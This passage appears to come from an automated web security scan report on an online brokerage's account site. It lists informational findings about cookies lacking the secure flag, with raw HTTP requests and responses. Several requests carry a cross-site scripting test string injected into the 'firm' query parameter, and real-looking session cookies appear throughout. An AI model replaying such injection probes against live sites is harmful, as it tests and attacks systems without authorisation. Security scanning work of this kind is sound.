Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 385
Content-Type: image/png
Last-Modified: Thu, 28 Oct 2010 18:35:54 GMT
Accept-Ranges: bytes
ETag: "b848a2f4ce76cb1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=2AB1B991426954C9E6064DB17C6FCAD0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:26 GMT

.PNG
.
...IHDR.............Q(......tEXtSoftware.Adobe ImageReadyq.e<...#IDATx.b...?..01@...b....ed......$r..D......P.. . ..z..(S.R
..6>.Y......@z........n....@J.I..P.S&..O..1..'.^........@.@.a:..@
...[SNIP]...

6.21. https://account.optionsxpress.com/images/newaccount/nap_tip_icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/nap_tip_icon.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newaccount/nap_tip_icon.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 329
Content-Type: image/gif
Last-Modified: Tue, 11 May 2010 17:47:16 GMT
Accept-Ranges: bytes
ETag: "70e98fe31f1ca1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=991AE206424B97B6F977F9B28BE347B2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:27 GMT

GIF89a.............f..q..Wy.Vu.W{.T~....W|..........Z..g..X..X.Wx.Vv.......V.}.....e........_..R|...................Ny................................................................................
...[SNIP]...

6.22. https://account.optionsxpress.com/images/openAccount_bottom.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/openAccount_bottom.jpg

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/openAccount_bottom.jpg HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 892
Content-Type: image/jpeg
Last-Modified: Mon, 10 May 2010 20:56:33 GMT
Accept-Ranges: bytes
ETag: "30977b4583f0ca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0E746D3A46A028879E86A893334AE28A; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=0E746D3A46A028879E86A893334AE28A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

......JFIF.....d.d......Ducky..............Adobe.d.........................#....#"....."'.#!!#.''.030.'>>AA>>AAAAAAAAAAAAAAA................!....!1!!$!!1>-''''->8;333;8AA>>AAAAAAAAAAAAAAAAA...........
...[SNIP]...

6.23. https://account.optionsxpress.com/images/plus_new_acct.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/plus_new_acct.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/plus_new_acct.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 178
Content-Type: image/gif
Last-Modified: Mon, 20 Jun 2005 14:21:17 GMT
Accept-Ranges: bytes
ETag: "b0e14052a375c51:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=D7A2A4EA4D6B84512DA39A9BEE64DA2F; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=D7A2A4EA4D6B84512DA39A9BEE64DA2F; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a    .    ....................................................................................................!.......,....    .    .@./`..$...(BB.N. .r1..#4...@T"Q........(....B.J....;

6.24. https://account.optionsxpress.com/images/rightColumn_divider.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/rightColumn_divider.jpg

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/rightColumn_divider.jpg HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 624
Content-Type: image/jpeg
Last-Modified: Mon, 10 May 2010 20:56:06 GMT
Accept-Ranges: bytes
ETag: "40c45d3583f0ca1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=8FAC75CE47AFCEB5B19049BC92732706; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=8FAC75CE47AFCEB5B19049BC92732706; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

......JFIF.....d.d......Ducky.......1.....!Adobe.d...........    .......%...n..................................................%$$$%)))))))))).    ..    
   .

........................................##"##))
...[SNIP]...

6.25. https://account.optionsxpress.com/images/styles/bubble/b.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/b.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/b.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 95
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "f0c783bc1bfcca1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=77A51C33434FCC2754ED389A537B984E; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a...........f.LLL...ccc.................................!.......,.............Ii...q
.H..;

6.26. https://account.optionsxpress.com/images/styles/bubble/bl.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/bl.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/bl.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 1197
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "50b284bc1bfcca1:fd0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=E4CCE9D34E711E38DE7ADA84B79732F8; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a...........f.......MMM...............___YYY...............PPP.i....www.........qqq......}}}TTT....s................~~~JJJ...ccc..............i....u...........z"....{#..2HHH........F....j........
...[SNIP]...

6.27. https://account.optionsxpress.com/images/styles/bubble/br.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/br.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/br.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 366
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "203d84bc1bfcca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=956B761F4FA5D2BDCA16DB89838483FB; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a
....1.....f.......ddd..................iii.................................rrr...eee.....................VVV...hhh..^.\.._.W.uN5.c    LLL|V<PPP....a.MMM...........................................
...[SNIP]...

6.28. https://account.optionsxpress.com/images/styles/bubble/l.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/l.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/l.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 54
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "f05681bc1bfcca1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=66E456154210275BF1AD2294C24E11C3; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:50 GMT

GIF89a...........f.......!.......,.............'.....;

6.29. https://account.optionsxpress.com/images/styles/bubble/r.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/r.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/r.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 65
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "d0881bc1bfcca1:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4F0588BA4BA85289A097B6894C4CDEEB; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:50 GMT

GIF89a
..........f.............ddd...!.......,....
........aSD$.;

6.30. https://account.optionsxpress.com/images/styles/bubble/t.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/t.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/t.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 44
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "a0227ebc1bfcca1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F7D09A6D4566E6FDAE591B92DED017AF; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:51 GMT

GIF89a...........f.!.......,...........L...;

6.31. https://account.optionsxpress.com/images/styles/bubble/tl.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/tl.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/tl.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 117
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:40 GMT
Accept-Ranges: bytes
ETag: "d0d71abd1bfcca1:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=AFEC1DFC41D58A640965F69675769361; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:50 GMT

GIF89a..........f...........y...e........d.x...2..h.........!......,.........."..I+1%.........%.#.@..fu(...1.h..F.;

6.32. https://account.optionsxpress.com/images/styles/bubble/tr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/tr.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/tr.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 168
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:40 GMT
Accept-Ranges: bytes
ETag: "90ac1cbd1bfcca1:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=9A7796FB49428C50E2B66E9C59EA7A3A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a
.......f................................x..m...........-...........f..R..b...........................!.......,....
.....% .X.#.W
..3.B. .P......0...P.%V..a ...;

6.33. https://account.optionsxpress.com/images/welcome/home/log_out.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/welcome/home/log_out.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/welcome/home/log_out.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Firm=OX; expires=Fri, 09-Sep-2011 07:25:29 GMT; path=/
Set-Cookie: TLTHID=E6E958F44B303A4485671B976182E8E0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

6.34. https://account.optionsxpress.com/images/welcome/home/open_account_4.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/welcome/home/open_account_4.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/welcome/home/open_account_4.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 18 May 2011 15:39:54 GMT
Accept-Ranges: bytes
ETag: "d7ffadd57115cc1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=CF5297BD4EE7D9842FB52BA82A45D6B5; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:25 GMT

GIF89a.............!.......,...........D..;

6.35. https://account.optionsxpress.com/inc/general.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/general.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/general.js HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
